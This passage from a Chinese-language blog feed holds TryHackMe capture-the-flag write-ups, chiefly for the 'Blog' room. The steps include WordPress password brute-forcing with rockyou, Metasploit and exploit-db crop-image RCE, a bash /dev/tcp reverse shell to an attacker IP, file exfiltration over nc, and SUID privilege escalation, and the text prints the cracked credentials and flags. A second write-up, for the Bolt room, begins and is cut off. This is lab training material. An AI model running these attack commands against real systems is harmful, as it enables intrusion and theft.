&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Rss Generator (Passive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;feed&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;, https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;wordpress&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;org&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;?v&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;5.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;comments&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;feed&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;, https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;wordpress&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;org&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;?v&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;5.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] WordPress theme &lt;span style="color:#ff79c6"&gt;in&lt;/span&gt; use: twentytwenty
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Location: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wp&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;content&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;themes&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;twentytwenty&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Last Updated: &lt;span style="color:#bd93f9"&gt;2021&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;07&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;22&lt;/span&gt;T00:&lt;span style="color:#bd93f9"&gt;00&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;00.000&lt;/span&gt;Z
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Readme: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wp&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;content&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;themes&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;twentytwenty&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;readme&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; [&lt;span style="color:#ff79c6"&gt;!&lt;/span&gt;] The version is out of date, the latest version is &lt;span style="color:#bd93f9"&gt;1.8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Style URL: http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wp&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;content&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;themes&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;twentytwenty&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;style&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;css?ver&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;1.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Style Name: Twenty Twenty
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Style URI: https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;wordpress&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;org&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;themes&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;twentytwenty&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Description: Our default theme &lt;span style="color:#ff79c6"&gt;for&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;2020&lt;/span&gt; is designed to take full advantage of the flexibility of the block editor&lt;span style="color:#ff79c6"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Author: the WordPress team
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Author URI: https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;wordpress&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;org&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Css Style In Homepage (Passive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Confirmed By: Css Style In &lt;span style="color:#bd93f9"&gt;404&lt;/span&gt; Page (Passive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Version: &lt;span style="color:#bd93f9"&gt;1.3&lt;/span&gt; (&lt;span style="color:#bd93f9"&gt;80&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;%&lt;/span&gt; confidence)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; Found By: Style (Passive Detection)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;|&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; http:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;blog&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;thm&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;wp&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt;content&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;themes&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;twentytwenty&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;style&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;css?ver&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;&lt;span style="color:#bd93f9"&gt;1.3&lt;/span&gt;, Match: &lt;span style="color:#f1fa8c"&gt;&amp;#39;Version: 1.3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Enumerating All Plugins (via Passive Methods)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[i] No plugins Found&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Enumerating Config Backups (via Passive &lt;span style="color:#ff79c6"&gt;and&lt;/span&gt; Aggressive Methods)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Checking Config Backups &lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; Time: &lt;span style="color:#bd93f9"&gt;00&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;00&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;16&lt;/span&gt; (&lt;span style="color:#bd93f9"&gt;137&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;/&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;137&lt;/span&gt;) &lt;span style="color:#bd93f9"&gt;100.00&lt;/span&gt;&lt;span style="color:#ff79c6"&gt;%&lt;/span&gt; Time: &lt;span style="color:#bd93f9"&gt;00&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;00&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;16&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[i] No Config Backups Found&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;!&lt;/span&gt;] No WPScan API Token given, as a result vulnerability data has &lt;span style="color:#ff79c6"&gt;not&lt;/span&gt; been output&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;!&lt;/span&gt;] You can get a free API token with &lt;span style="color:#bd93f9"&gt;25&lt;/span&gt; daily requests by registering at https:&lt;span style="color:#ff79c6"&gt;//&lt;/span&gt;wpscan&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;com&lt;span style="color:#ff79c6"&gt;/&lt;/span&gt;register
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Finished: Sat Aug &lt;span style="color:#bd93f9"&gt;7&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;01&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;17&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;25&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;2021&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Requests Done: &lt;span style="color:#bd93f9"&gt;170&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Cached Requests: &lt;span style="color:#bd93f9"&gt;7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Data Sent: &lt;span style="color:#bd93f9"&gt;40.812&lt;/span&gt; KB
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Data Received: &lt;span style="color:#bd93f9"&gt;322.273&lt;/span&gt; KB
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Memory used: &lt;span style="color:#bd93f9"&gt;213.184&lt;/span&gt; MB
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;] Elapsed time: &lt;span style="color:#bd93f9"&gt;00&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;00&lt;/span&gt;:&lt;span style="color:#bd93f9"&gt;51&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;可以發現 &lt;code&gt;wp-content/oploads&lt;/code&gt; 目錄沒有鎖&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6f3f9-8svkMhr.png"&gt;前面有發現 Wordpress 的版本是 5.0- 上 searchsploit 尋找看看有沒有可以用的 Exploit&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/91c6a-XdhUTF7.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wget https://www.exploit-db.com/download/49512 -O 49512.py&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;然而執行起來發現需要帳號密碼，所以就暫時先放一邊&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="smb"&gt;SMB&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;前面 nmap 發現他有開 SMB 的 port來掃看看 &lt;code&gt;smbmap -H blog.thm&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;可以發現有開一個Disk 叫做BillySMB&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7dd70-VVCQqzB.png"&gt;也可以用 &lt;code&gt;smbclient -L //blog.thm&lt;/code&gt; 列出裡面的資訊- 由於 SMB 可以使用匿名登入，所以詢問密碼只要直接按下 Enter即可&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/46280-LK2gmK3.png"&gt;如上截圖，發現會出現一個 SMB1 Disable 的 錯誤- 依照下列網址方式處理https://dalemazza.wordpress.com/2020/04/20/nt_status_io_timeout-smb-error-and-how-to-fix-it/修改 &lt;code&gt;/etc/samba/smb.conf&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e8c01-aQYUaqq.png"&gt;&lt;/li&gt;
&lt;li&gt;在 &lt;code&gt;[global]&lt;/code&gt; 裡面增加一行&lt;code&gt;client min protocol = NT1&lt;/code&gt;就可以正常使用ㄌ&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b7d3d-hBH947C.png"&gt;輸入 &lt;code&gt;smbclient -N '//blog/thm/BillySMB'&lt;/code&gt;- 可以直接進入 SMB 的 CLI&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bc196-OuYvUAB.png"&gt;輸入 &lt;code&gt;ls&lt;/code&gt; 觀察裡面的資料- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ee642-hs2h6dq.png"&gt;輸入 &lt;code&gt;get {檔名}&lt;/code&gt; 依序把檔案拔出來- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/77719-IovRpfM.png"&gt;發現裡面有一張 QR Code- 網路上找一個 QR 轉換器&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/668dd-9vX5G7o.png"&gt;然而只是一個普通的 Youtube 連結其他也都只是滿無聊的圖檔，沒有什麼特別&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="爆破密碼"&gt;爆破密碼&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;爆破密碼很無聊，但有時候很有用針對 Wordpress 可以用 &lt;code&gt;wpscan&lt;/code&gt; 內建的爆破方法我們先準備一個 &lt;code&gt;user.txt&lt;/code&gt; 裡面有兩行，分別是兩個使用者&lt;code&gt;bjoel&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;kwheel``wpscan --url http://blog.thm/ -U user.txt -P /opt/rockyou.txt&lt;/code&gt;- 接下來使用 &lt;code&gt;-U&lt;/code&gt; 配使用者名稱檔案&lt;/li&gt;
&lt;li&gt;&lt;code&gt;-P&lt;/code&gt; 配密碼字典檔來未看先猜一下，爆出來比較有機會的是 &lt;code&gt;kwheel&lt;/code&gt;- 因為是開發者的媽媽，老人家資安意識比較差&lt;/li&gt;
&lt;li&gt;&lt;del&gt;抱歉我就歧視&lt;/del&gt;等了十幾分鐘，真的成功的爆出了密碼!!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/656a1-tsmDBHk.png"&gt;&lt;code&gt;kwheel&lt;/code&gt; / &lt;code&gt;cutiepie1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;果然老人家愛用弱密碼&lt;/code&gt;接下來到 &lt;code&gt;/wp-admin&lt;/code&gt; 準備登入- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ad5d8-BsDUBsd.png"&gt;&lt;/li&gt;
&lt;li&gt;也就真的順利登入了!!&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8bca4-d4ssuZc.png"&gt;不過我們的使用者是 &lt;code&gt;editor&lt;/code&gt;沒有權限可以修改 template 之類的方法取得 RCE&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="嘗試-exploit-db-的-payload-失敗"&gt;嘗試 exploit-db 的 Payload (失敗)&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;先講結論，失敗了，我也不知道為什麼 QQ我已經完全照著網路上的方法做&lt;/li&gt;
&lt;li&gt;但是還是怪怪ㄉ QQ使用先前載好的 &lt;a href="https://www.exploit-db.com/download/49512"&gt;https://www.exploit-db.com/download/49512&lt;/a&gt;依照提示準備一個 &lt;code&gt;gd.jpg&lt;/code&gt;- &lt;code&gt;cp Alice-White-Rabbit.jpg gd.jpg&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;這邊我直接使用 smb 偷出來的圖片用 exiftool 寫入 shell- &lt;code&gt;exiftool gd.jpg -CopyrightNotice=&amp;quot;&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4e778-F5TuZD8.png"&gt;&lt;/li&gt;
&lt;li&gt;在這邊我們可以用 strings 觀察，檔案真的被寫進去了&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6d149-HRcbPDx.png"&gt;修改原始碼的 &lt;code&gt;lhost&lt;/code&gt; 與 &lt;code&gt;lport&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/56a8a-2aBtMmn.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;python3 49512.py http://blog.thm/ kwheel cutiepie1 twentytwenty&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;nc -nvlp 7877&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;然而，都失敗了QQQ&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="使用大絕招-msf-"&gt;使用大絕招 msf !!&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;輸入 &lt;code&gt;msfconsole``use exploit/multi/http/wp_crop_rce&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;show options&lt;/code&gt;觀察需要的參數&lt;code&gt;set PASSWORD cutiepie1``set USERNAME kwheel``set RHOSTS blog.thm``set LHOST 10.13.21.55``exploit&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/77e41-KDy6Yfs.png"&gt;就成功接上了 meterpreter 的 shell- 但這邊我還是想使用普通的 reverse shell&lt;/li&gt;
&lt;li&gt;所以我們就輸入 &lt;code&gt;shell&lt;/code&gt; 切換進入再來我想接回 reverse shell- 在攻擊機輸入 &lt;code&gt;nc -nvlp 7877&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;meterpreter 輸入&lt;code&gt;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7877 0&amp;gt;&amp;amp;1'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;就可以順利接回 shell然而在使用者的家目錄看到的 &lt;code&gt;user.txt&lt;/code&gt; 是假的 QQ&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e47b3-2866L1g.png"&gt;沒關係，我現在懶得找，等有 root 後再說ㄅ觀察使用者家目錄有一個 pdf 檔案，抓出來研究看看- 攻擊機 &lt;code&gt;nc -l -p 1234 &amp;gt; Billy_Joel_Termination_May20-2020.pdf&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;靶機 `nc 10.13.21.55 1234&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="準備提權"&gt;準備提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;使用常常出現的工具 linpeas&lt;code&gt;wget 10.13.21.55:8000/linpeas.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bash linpeas.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;我們可以找到 wordpress 的資料庫密碼&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/60486-1oLP7fH.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;LittleYellowLamp90!@&lt;/code&gt;發現 sudo 版本是 1.8.21- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/aa87b-P09KTRL.png"&gt;發現一個奇怪的檔案有 &lt;code&gt;suid&lt;/code&gt;- 檔案路徑是 &lt;code&gt;/usr/sbin/checker&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/34506-c9aV2V5.png"&gt;觀察 Checker- 先把檔案傳出來攻擊機 &lt;code&gt;nc -l -p 1234 &amp;gt; checker&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;靶機 &lt;code&gt;nc 10.13.21.55 1234 使用 &lt;/code&gt;r2&lt;code&gt;分析-&lt;/code&gt;r2 checker`&lt;/li&gt;
&lt;li&gt;&lt;code&gt;aaa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;s main&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VV&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8306f-SrIENP9.png"&gt;&lt;/li&gt;
&lt;li&gt;可以發現他會把 &lt;code&gt;admin&lt;/code&gt; 傳入 &lt;code&gt;getenv&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;然後如果有值就會給我們一個 shell回到攻擊機，給予一個 &lt;code&gt;admin&lt;/code&gt; 的環境變數- &lt;code&gt;admin=meow /usr/sbin/checker&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;就拿到 root shell 了&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1f9a9-4XC0m19.png"&gt;取得 root flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/dafea-7NKvSBB.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9a0b2b618bef9bfa7ac28c1353d9f318&lt;/code&gt;等等 … 阿user flag ㄋ- 好懶得翻ㄛ…我們就暴力搜ㄅ&lt;/li&gt;
&lt;li&gt;&lt;code&gt;find / -iname user.txt -print 2&amp;gt;/dev/null&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cdc43-c1mpsB0.png"&gt;可以找到 user flag 藏在 &lt;code&gt;/media/usb/user.txt&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/63f7a-DbGCDlx.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;c8421899aae571f7af486492b71a8ab7&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Bolt (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/06/bolt-try-hack-me-writeup/</link><pubDate>Fri, 06 Aug 2021 23:56:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/06/bolt-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/bolt"&gt;https://tryhackme.com/room/bolt&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.51.13&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;rustscan -a 10.10.51.13&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/39232-rbBcQvt.png"&gt;&lt;/li&gt;
&lt;li&gt;發現有開22&lt;/li&gt;
&lt;li&gt;80&lt;/li&gt;
&lt;li&gt;8000&lt;code&gt;nmap -A -p22,80,8000 10.10.51.13&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5ee33-CeiD0Rn.png"&gt;觀察網頁- 80&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a6e81-rhs8G5g.png"&gt;8080- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c7f20-O89E4in.png"&gt;What port number has a web server with a CMS running?- 8000What is the username we can find in the CMS?- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b8b78-uuS49nr.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bolt&lt;/code&gt;What is the password we can find for the username?- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/785c5-uYjlWzV.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;boltadmin123``python3 dirsearch.py -u http://10.10.51.13:8000/ -e all&lt;/code&gt;- &lt;code&gt;http://10.10.51.13:8000/.htaccess&lt;/code&gt;裡面沒什麼特別網路上找到後臺網址- http://10.10.51.13:8000/bolt/login&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/96b39-ObFh4vj.png"&gt;What version of the CMS is installed on the server? (Ex: Name 1.1.1)- &lt;code&gt;Bolt 3.7.1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;上一張截圖最下面有寫Google &lt;code&gt;Bolt 3.7.1 Exploit&lt;/code&gt;- &lt;a href="https://www.exploit-db.com/exploits/48296"&gt;https://www.exploit-db.com/exploits/48296&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wget https://www.exploit-db.com/download/48296 -O 48296.py&lt;/code&gt;There&amp;rsquo;s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What&amp;rsquo;s its EDB-ID?- 48296&lt;/li&gt;
&lt;li&gt;不知道為什麼，我 run 起來失敗QQ網路上找到另外一組 exploit- &lt;a href="https://medium.com/@foxsin34/bolt-cms-3-7-1-authenticated-rce-remote-code-execution-ed781e03237b"&gt;https://medium.com/@foxsin34/bolt-cms-3-7-1-authenticated-rce-remote-code-execution-ed781e03237b&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c120a-W26KDy6.png"&gt;&lt;/li&gt;
&lt;li&gt;他莫名的把我的密碼改成 &lt;code&gt;password&lt;/code&gt; 了&lt;/li&gt;
